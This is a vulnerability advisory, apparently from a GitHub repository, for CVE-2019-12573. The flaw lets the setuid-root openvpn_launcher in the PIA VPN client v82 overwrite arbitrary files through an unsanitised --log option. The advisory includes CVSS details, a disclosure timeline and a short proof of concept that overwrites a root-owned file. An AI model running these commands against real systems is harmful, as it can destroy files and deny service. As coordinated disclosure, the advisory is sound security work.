Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

73 lines (44 sloc) 1.74 KB
Title: PIA Linux, macOS Arbitrary File Overwrite
Author: Rich Mirch
CVE: CVE-2019-12573
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA)
VPN Client v82 for Linux and macOS could allow an authenticated, local
attacker to overwrite arbitrary files.
The PIA Linux and macOS openvpn_launcher binary is setuid root. This
binary supports the --log option which accepts a path as an argument.
The --log parameter is not sanitized which allows a local unprivileged
to overwrite arbitrary files owned by any user on the system, including
root. This creates a denial of service condition and possible data loss
if leveraged by a malicious local user.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C
Base: 7.1
Temporal: 7.1
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce
Step 1 - Create a root owned test file. For this PoC /etc/test.txt is used.
# As root
echo "this is a test" > /etc/test.txt
chmod 600 /etc/test.txt
Step 2 - Overwrite the file using the --log option using a non privileged user.
# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt
# Linux
/opt/pia/openvpn_launcher.64 --log /etc/test.txt
Step 3 - Verify the file contents have been overwritten
# As root
cat /etc/test.txt
Timeline:
2018-12-23: Reported to vendor
2018-12-23: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure
You can’t perform that action at this time.